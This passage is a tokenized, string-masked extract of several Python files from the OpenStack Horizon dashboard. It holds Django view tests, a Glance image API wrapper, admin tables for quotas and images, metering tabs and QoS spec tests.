= self . factory . get ( '<STR_LIT:/>' , params , <EOL> HTTP_X_REQUESTED_WITH = '<STR_LIT>' ) <EOL> res = view ( req ) <EOL> self . assertEqual ( <NUM_LIT:200> , res . status_code ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> action_string = "<STR_LIT>" <EOL> req = self . factory . post ( '<STR_LIT:/>' , { '<STR_LIT:action>' : action_string } ) <EOL> res = view ( req ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_code ) <EOL> self . assertEqual ( "<STR_LIT:/>" , res [ "<STR_LIT:location>" ] ) <EOL> action_string = "<STR_LIT>" <EOL> req = self . factory . post ( '<STR_LIT:/>' , { '<STR_LIT:action>' : action_string } ) <EOL> self . assertRaises ( exceptions . Http302 , view , req ) <EOL> class TabExceptionTests ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TabExceptionTests , self ) . setUp ( ) <EOL> self . _original_tabs = copy . copy ( TabWithTableView . tab_group_class . tabs ) <EOL> TabWithTableView . tab_group_class . tabs . append ( RecoverableErrorTab ) <EOL> def tearDown ( self ) : <EOL> super ( TabExceptionTests , self ) . tearDown ( ) <EOL> TabWithTableView . tab_group_class . tabs = self . _original_tabs <EOL> def test_tab_view_exception ( self ) : <EOL> view = TabWithTableView . as_view ( ) <EOL> req = self . factory . get ( "<STR_LIT:/>" ) <EOL> res = view ( req ) <EOL> self . assertMessageCount ( res , error = <NUM_LIT:1> ) </s>
<s> from __future__ import absolute_import <EOL> import collections <EOL> import itertools <EOL> import json <EOL> import logging <EOL> from django . conf import settings <EOL> import glanceclient as glance_client <EOL> from six . moves import _thread as thread <EOL> from horizon . utils import functions as utils <EOL> from horizon . utils . memoized import memoized <EOL> from openstack_dashboard . api import base <EOL> LOG = logging . getLogger ( __name__ ) <EOL> VERSIONS = base . APIVersionManager ( "<STR_LIT:image>" , preferred_version = <NUM_LIT:2> ) <EOL> @ memoized <EOL> def glanceclient ( request , version = '<STR_LIT:1>' ) : <EOL> url = base . url_for ( request , '<STR_LIT:image>' ) <EOL> insecure = getattr ( settings , '<STR_LIT>' , False ) <EOL> cacert = getattr ( settings , '<STR_LIT>' , None ) <EOL> return glance_client . Client ( version , url , token = request . user . token . id , <EOL> insecure = insecure , cacert = cacert ) <EOL> def image_delete ( request , image_id ) : <EOL> return glanceclient ( request ) . images . delete ( image_id ) <EOL> def image_get ( request , image_id ) : <EOL> """<STR_LIT>""" <EOL> image = glanceclient ( request ) . images . get ( image_id ) <EOL> if not hasattr ( image , '<STR_LIT:name>' ) : <EOL> image . name = None <EOL> return image <EOL> def image_list_detailed ( request , marker = None , sort_dir = '<STR_LIT>' , <EOL> sort_key = '<STR_LIT>' , filters = None , paginate = False ) : <EOL> limit = getattr ( settings , '<STR_LIT>' , <NUM_LIT:1000> ) <EOL> page_size = utils . get_page_size ( request ) <EOL> if paginate : <EOL> request_size = page_size + <NUM_LIT:1> <EOL> else : <EOL> request_size = limit <EOL> kwargs = { '<STR_LIT>' : filters or { } } <EOL> if marker : <EOL> kwargs [ '<STR_LIT>' ] = marker <EOL> kwargs [ '<STR_LIT>' ] = sort_dir <EOL> kwargs [ '<STR_LIT>' ] = sort_key <EOL> images_iter = glanceclient ( request ) . images . list ( page_size = request_size , <EOL> limit = limit , <EOL> ** kwargs ) <EOL> has_prev_data = False <EOL> has_more_data = False <EOL> if paginate : <EOL> images = list ( itertools . islice ( images_iter , request_size ) ) <EOL> if len ( images ) > page_size : <EOL> images . pop ( - <NUM_LIT:1> ) <EOL> has_more_data = True <EOL> if marker is not None : <EOL> has_prev_data = True <EOL> elif sort_dir == '<STR_LIT>' and marker is not None : <EOL> has_more_data = True <EOL> elif marker is not None : <EOL> has_prev_data = True <EOL> else : <EOL> images = list ( images_iter ) <EOL> return ( images , has_more_data , has_prev_data ) <EOL> def image_update ( request , image_id , ** kwargs ) : <EOL> return glanceclient ( request ) . images . update ( image_id , ** kwargs ) <EOL> def image_create ( request , ** kwargs ) : <EOL> copy_from = kwargs . pop ( '<STR_LIT>' , None ) <EOL> data = kwargs . pop ( '<STR_LIT:data>' , None ) <EOL> image = glanceclient ( request ) . images . create ( ** kwargs ) <EOL> if data : <EOL> thread . start_new_thread ( image_update , <EOL> ( request , image . id ) , <EOL> { '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : False } ) <EOL> elif copy_from : <EOL> thread . start_new_thread ( image_update , <EOL> ( request , image . id ) , <EOL> { '<STR_LIT>' : copy_from , <EOL> '<STR_LIT>' : False } ) <EOL> return image <EOL> def image_update_properties ( request , image_id , remove_props = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . images . update ( image_id , <EOL> remove_props , <EOL> ** kwargs ) <EOL> def image_delete_properties ( request , image_id , keys ) : <EOL> """<STR_LIT>""" <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . images . update ( image_id , keys ) <EOL> class BaseGlanceMetadefAPIResourceWrapper ( base . APIResourceWrapper ) : <EOL> @ property <EOL> def description ( self ) : <EOL> return ( getattr ( self . _apiresource , '<STR_LIT:description>' , None ) or <EOL> getattr ( self . _apiresource , '<STR_LIT>' , None ) ) <EOL> def as_json ( self , indent = <NUM_LIT:4> ) : <EOL> result = collections . OrderedDict ( ) <EOL> for attr in self . _attrs : <EOL> if hasattr ( self , attr ) : <EOL> result [ attr ] = getattr ( self , attr ) <EOL> return json . dumps ( result , indent = indent ) <EOL> class Namespace ( BaseGlanceMetadefAPIResourceWrapper ) : <EOL> _attrs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ property <EOL> def resource_type_names ( self ) : <EOL> result = [ resource_type [ '<STR_LIT:name>' ] for resource_type in <EOL> getattr ( self . _apiresource , '<STR_LIT>' ) ] <EOL> return sorted ( result ) <EOL> @ property <EOL> def public ( self ) : <EOL> if getattr ( self . _apiresource , '<STR_LIT>' ) == '<STR_LIT>' : <EOL> return True <EOL> else : <EOL> return False <EOL> def metadefs_namespace_get ( request , namespace , resource_type = None , wrap = False ) : <EOL> namespace = glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . get ( namespace , resource_type = resource_type ) <EOL> if wrap : <EOL> return Namespace ( namespace ) <EOL> else : <EOL> return namespace <EOL> def metadefs_namespace_list ( request , <EOL> filters = { } , <EOL> sort_dir = '<STR_LIT>' , <EOL> sort_key = '<STR_LIT>' , <EOL> marker = None , <EOL> paginate = False ) : <EOL> """<STR_LIT>""" <EOL> limit = getattr ( settings , '<STR_LIT>' , <NUM_LIT:1000> ) <EOL> page_size = utils . get_page_size ( request ) <EOL> if paginate : <EOL> request_size = page_size + <NUM_LIT:1> <EOL> else : <EOL> request_size = limit <EOL> kwargs = { '<STR_LIT>' : filters } <EOL> if marker : <EOL> kwargs [ '<STR_LIT>' ] = marker <EOL> kwargs [ '<STR_LIT>' ] = sort_dir <EOL> kwargs [ '<STR_LIT>' ] = sort_key <EOL> namespaces_iter = glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . list ( <EOL> page_size = request_size , limit = limit , ** kwargs ) <EOL> has_prev_data = False <EOL> has_more_data = False <EOL> if paginate : <EOL> namespaces = list ( itertools . islice ( namespaces_iter , request_size ) ) <EOL> if len ( namespaces ) > page_size : <EOL> namespaces . pop ( - <NUM_LIT:1> ) <EOL> has_more_data = True <EOL> if marker is not None : <EOL> has_prev_data = True <EOL> elif sort_dir == '<STR_LIT>' and marker is not None : <EOL> has_more_data = True <EOL> elif marker is not None : <EOL> has_prev_data = True <EOL> else : <EOL> namespaces = list ( namespaces_iter ) <EOL> namespaces = [ Namespace ( namespace ) for namespace in namespaces ] <EOL> return namespaces , has_more_data , has_prev_data <EOL> def metadefs_namespace_create ( request , namespace ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . create ( ** namespace ) <EOL> def metadefs_namespace_update ( request , namespace_name , ** properties ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . update ( <EOL> namespace_name , <EOL> ** properties ) <EOL> def metadefs_namespace_delete ( request , namespace_name ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . delete ( namespace_name ) <EOL> def metadefs_resource_types_list ( request ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . list ( ) <EOL> def metadefs_namespace_resource_types ( request , namespace_name ) : <EOL> resource_types = glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . get ( <EOL> namespace_name ) <EOL> return list ( resource_types ) <EOL> def metadefs_namespace_add_resource_type ( request , <EOL> namespace_name , <EOL> resource_type ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . associate ( <EOL> namespace_name , ** resource_type ) <EOL> def metadefs_namespace_remove_resource_type ( request , <EOL> namespace_name , <EOL> resource_type_name ) : <EOL> glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . deassociate ( <EOL> namespace_name , resource_type_name ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> class QuotaFilterAction ( tables . FilterAction ) : <EOL> def filter ( self , table , tenants , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( tenant ) : <EOL> if q in tenant . name . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , tenants ) <EOL> class UpdateDefaultQuotas ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> def get_quota_name ( quota ) : <EOL> QUOTA_NAMES = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> return QUOTA_NAMES . get ( quota . name , quota . name . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) . title ( ) ) <EOL> class QuotasTable ( tables . DataTable ) : <EOL> name = tables . Column ( get_quota_name , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> limit = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return obj . name <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( QuotaFilterAction , UpdateDefaultQuotas ) <EOL> multi_select = False </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . images . images import tables as project_tables <EOL> class AdminCreateImage ( project_tables . CreateImage ) : <EOL> url = "<STR_LIT>" <EOL> class AdminDeleteImage ( project_tables . DeleteImage ) : <EOL> def allowed ( self , request , image = None ) : <EOL> if image and image . protected : <EOL> return False <EOL> else : <EOL> return True <EOL> class AdminEditImage ( project_tables . EditImage ) : <EOL> url = "<STR_LIT>" <EOL> def allowed ( self , request , image = None ) : <EOL> return True <EOL> class UpdateMetadata ( tables . LinkAction ) : <EOL> url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> class UpdateRow ( tables . Row ) : <EOL> ajax = True <EOL> def get_data ( self , request , image_id ) : <EOL> image = api . glance . image_get ( request , image_id ) <EOL> return image <EOL> class AdminImageFilterAction ( tables . FilterAction ) : <EOL> filter_type = "<STR_LIT>" <EOL> filter_choices = ( ( '<STR_LIT:name>' , _ ( "<STR_LIT>" ) , True ) , <EOL> ( '<STR_LIT:status>' , _ ( '<STR_LIT>' ) , True ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , True ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , True ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , True ) ) <EOL> class AdminImagesTable ( project_tables . ImagesTable ) : <EOL> name = tables . Column ( "<STR_LIT:name>" , <EOL> link = "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> row_class = UpdateRow <EOL> status_columns = [ "<STR_LIT:status>" ] <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AdminCreateImage , AdminDeleteImage , <EOL> AdminImageFilterAction ) <EOL> row_actions = ( AdminEditImage , UpdateMetadata , AdminDeleteImage ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import messages <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import ceilometer <EOL> from openstack_dashboard . dashboards . admin . metering import tables as metering_tables <EOL> from openstack_dashboard . utils import metering <EOL> class GlobalStatsTab ( tabs . TableTab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> preload = False <EOL> table_classes = ( metering_tables . UsageTable , ) <EOL> def get_context_data ( self , request ) : <EOL> meters = ceilometer . Meters ( request ) <EOL> if not meters . _ceilometer_meter_list : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> messages . warning ( request , msg ) <EOL> context = { <EOL> '<STR_LIT>' : meters . list_nova ( ) , <EOL> '<STR_LIT>' : meters . list_neutron ( ) , <EOL> '<STR_LIT>' : meters . list_glance ( ) , <EOL> '<STR_LIT>' : meters . list_cinder ( ) , <EOL> '<STR_LIT>' : meters . list_swift ( ) , <EOL> '<STR_LIT>' : meters . list_kwapi ( ) , <EOL> } <EOL> return context <EOL> class UsageReportTab ( tabs . TableTab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> table_classes = ( metering_tables . ReportTable , ) <EOL> def get_report_table_data ( self ) : <EOL> meters = ceilometer . Meters ( self . request ) <EOL> services = { <EOL> _ ( '<STR_LIT>' ) : meters . list_nova ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_neutron ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_glance ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_cinder ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_swift ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_kwapi ( ) , <EOL> } <EOL> report_rows = [ ] <EOL> date_options = self . request . session . get ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> date_from = self . request . session . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> date_to = self . request . session . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> date_from , date_to = metering . calc_date_args ( date_from , <EOL> date_to , <EOL> date_options ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , _ ( '<STR_LIT>' ) ) <EOL> try : <EOL> project_aggregates = metering . ProjectAggregatesQuery ( self . request , <EOL> date_from , <EOL> date_to , <EOL> <NUM_LIT> * <NUM_LIT> ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> for meter in meters . _cached_meters . values ( ) : <EOL> service = None <EOL> for name , m_list in services . items ( ) : <EOL> if meter in m_list : <EOL> service = name <EOL> break <EOL> res , unit = project_aggregates . query ( meter . name ) <EOL> for re in res : <EOL> values = re . get_meter ( meter . name . replace ( "<STR_LIT:.>" , "<STR_LIT:_>" ) ) <EOL> if values : <EOL> for value in values : <EOL> row = { "<STR_LIT:name>" : '<STR_LIT:none>' , <EOL> "<STR_LIT>" : re . id , <EOL> "<STR_LIT>" : meter . name , <EOL> "<STR_LIT:description>" : meter . description , <EOL> "<STR_LIT>" : service , <EOL> "<STR_LIT:time>" : value . _apiresource . period_end , <EOL> "<STR_LIT:value>" : value . _apiresource . avg } <EOL> report_rows . append ( row ) <EOL> return report_rows <EOL> class CeilometerOverviewTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( UsageReportTab , GlobalStatsTab , ) <EOL> sticky = True </s>
<s> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> from openstack_dashboard . dashboards . admin import dashboard <EOL> class Routers ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = '<STR_LIT>' <EOL> permissions = ( '<STR_LIT>' , ) <EOL> network_config = getattr ( settings , '<STR_LIT>' , { } ) <EOL> if network_config . get ( '<STR_LIT>' , True ) : <EOL> dashboard . Admin . register ( Routers ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from mox import IsA <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> class QosSpecsTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , ) , } ) <EOL> def test_manage_qos_spec ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> index_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ qos_spec . id ] ) <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( index_url ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> rows = res . context [ '<STR_LIT>' ] . get_rows ( ) <EOL> specs = self . cinder_qos_specs . first ( ) . specs <EOL> for row in rows : <EOL> key = row . cells [ '<STR_LIT:key>' ] . data <EOL> self . assertTrue ( key in specs ) <EOL> self . assertEqual ( row . cells [ '<STR_LIT:value>' ] . data , <EOL> specs . get ( key ) ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , ) } ) <EOL> def test_create_qos_spec ( self ) : <EOL> formData = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> api . cinder . qos_spec_create ( IsA ( http . HttpRequest ) , <EOL> formData [ '<STR_LIT:name>' ] , <EOL> { '<STR_LIT>' : formData [ '<STR_LIT>' ] } ) . AndReturn ( self . cinder_qos_specs . first ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , redirect ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) } ) <EOL> def test_delete_qos_spec ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> formData = { '<STR_LIT:action>' : '<STR_LIT>' % qos_spec . id } <EOL> api . cinder . volume_type_list_with_qos_associations ( <EOL> IsA ( http . HttpRequest ) ) . AndReturn ( self . volume_types . list ( ) ) <EOL> api . cinder . qos_spec_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . cinder_qos_specs . list ( ) ) <EOL> api . cinder . qos_spec_delete ( IsA ( http . HttpRequest ) , <EOL> str ( qos_spec . id ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , redirect ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , } ) <EOL> def test_spec_edit ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> key = '<STR_LIT>' <EOL> edit_url = reverse ( '<STR_LIT>' , <EOL> args = [ qos_spec . id , key ] ) <EOL> index_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ qos_spec . id ] ) <EOL> data = { '<STR_LIT:value>' : '<STR_LIT>' } <EOL> qos_spec . specs [ key ] = data [ '<STR_LIT:value>' ] <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_get_keys ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id , raw = True ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_set_keys ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id , <EOL> qos_spec . specs ) <EOL> self . mox . ReplayAll ( ) <EOL> resp = self . client . post ( edit_url , data ) <EOL> self . assertNoFormErrors ( resp ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( resp , index_url ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , } ) <EOL> def test_edit_consumer ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' } <EOL> edit_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ qos_spec . id ] ) <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_set_keys ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id , <EOL> { '<STR_LIT>' : formData [ '<STR_LIT>' ] } ) <EOL> self . mox . ReplayAll ( ) <EOL> resp = self . client . post ( edit_url , formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( resp ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( resp , redirect ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , } ) <EOL> def test_associate_qos_spec ( self ) : <EOL> volume_type = self . volume_types . first ( ) <EOL> volume_types = self . volume_types . list ( ) <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> qos_specs = self . cinder_qos_specs . list ( ) <EOL> formData = { '<STR_LIT>' : qos_spec . id } <EOL> edit_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ volume_type . id ] ) <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_list ( IsA ( http . HttpRequest ) ) . AndReturn ( qos_specs ) <EOL> api . cinder . qos_spec_get_associations ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( volume_types ) <EOL> api . cinder . qos_spec_get_associations ( IsA ( http . HttpRequest ) , <EOL> qos_specs [ <NUM_LIT:1> ] . id ) . AndReturn ( volume_types ) <EOL> api . cinder . volume_type_get ( IsA ( http . HttpRequest ) , <EOL> str ( volume_type . id ) ) . AndReturn ( volume_type ) <EOL> api . cinder . qos_spec_associate ( IsA ( http . HttpRequest ) , <EOL> qos_spec , <EOL> str ( volume_type . id ) ) <EOL> self . mox . ReplayAll ( ) <EOL> resp = self . client . post ( edit_url , formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( resp ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( resp , redirect ) </s>
<s> import copy <EOL> import datetime <EOL> import logging <EOL> import os <EOL> import django <EOL> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from django . utils import timezone <EOL> from django . utils import unittest <EOL> from mox import IgnoreArg <EOL> from mox import IsA <EOL> from horizon import exceptions <EOL> from horizon . workflows import views <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . identity . projects import workflows <EOL> from openstack_dashboard . test import helpers as test <EOL> from openstack_dashboard import usage <EOL> from openstack_dashboard . usage import quotas <EOL> with_sel = os . environ . get ( '<STR_LIT>' , False ) <EOL> if with_sel : <EOL> from selenium . webdriver import ActionChains <EOL> from selenium . webdriver . common import keys <EOL> from socket import timeout as socket_timeout <EOL> INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> USER_ROLE_PREFIX = workflows . PROJECT_GROUP_MEMBER_SLUG + "<STR_LIT>" <EOL> GROUP_ROLE_PREFIX = workflows . PROJECT_USER_MEMBER_SLUG + "<STR_LIT>" <EOL> class TenantsViewTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) , <EOL> domain = None , <EOL> paginate = True , <EOL> marker = None ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , self . tenants . list ( ) ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index_with_domain_context ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> domain_tenants = [ tenant for tenant in self . tenants . list ( ) <EOL> if tenant . domain_id == domain . id ] <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) , <EOL> domain = domain . id , <EOL> paginate = True , <EOL> marker = None ) . AndReturn ( [ domain_tenants , False ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , domain_tenants ) <EOL> self . assertContains ( res , "<STR_LIT>" ) <EOL> class ProjectsViewNonAdminTests ( test . TestCase ) : <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) , <EOL> user = self . user . id , <EOL> paginate = True , <EOL> marker = None , <EOL> admin = False ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , self . tenants . list ( ) ) <EOL> class CreateProjectWorkflowTests ( test . BaseAdminViewTests ) : <EOL> def _get_project_info ( self , project ) : <EOL> domain = self . _get_default_domain ( ) <EOL> project_info = { "<STR_LIT:name>" : project . name , <EOL> "<STR_LIT:description>" : project . description , <EOL> "<STR_LIT>" : project . enabled , <EOL> "<STR_LIT>" : domain . id } <EOL> return project_info <EOL> def _get_workflow_fields ( self , project ) : <EOL> domain = self . _get_default_domain ( ) <EOL> project_info = { "<STR_LIT>" : domain . id , <EOL> "<STR_LIT>" : domain . name , <EOL> "<STR_LIT:name>" : project . name , <EOL> "<STR_LIT:description>" : project . description , <EOL> "<STR_LIT>" : project . enabled } <EOL> return project_info <EOL> def _get_quota_info ( self , quota ) : <EOL> cinder_quota = self . cinder_quotas . first ( ) <EOL> neutron_quota = self . neutron_quotas . first ( ) <EOL> quota_data = { } <EOL> for field in quotas . NOVA_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( quota . get ( field ) . limit ) <EOL> for field in quotas . CINDER_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( cinder_quota . get ( field ) . limit ) <EOL> for field in quotas . NEUTRON_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( neutron_quota . get ( field ) . limit ) <EOL> return quota_data <EOL> def _get_workflow_data ( self , project , quota ) : <EOL> project_info = self . _get_workflow_fields ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> project_info . update ( quota_data ) <EOL> return project_info <EOL> def _get_default_domain ( self ) : <EOL> default_domain = self . domain <EOL> domain = { "<STR_LIT:id>" : self . request . session . get ( '<STR_LIT>' , <EOL> default_domain . id ) , 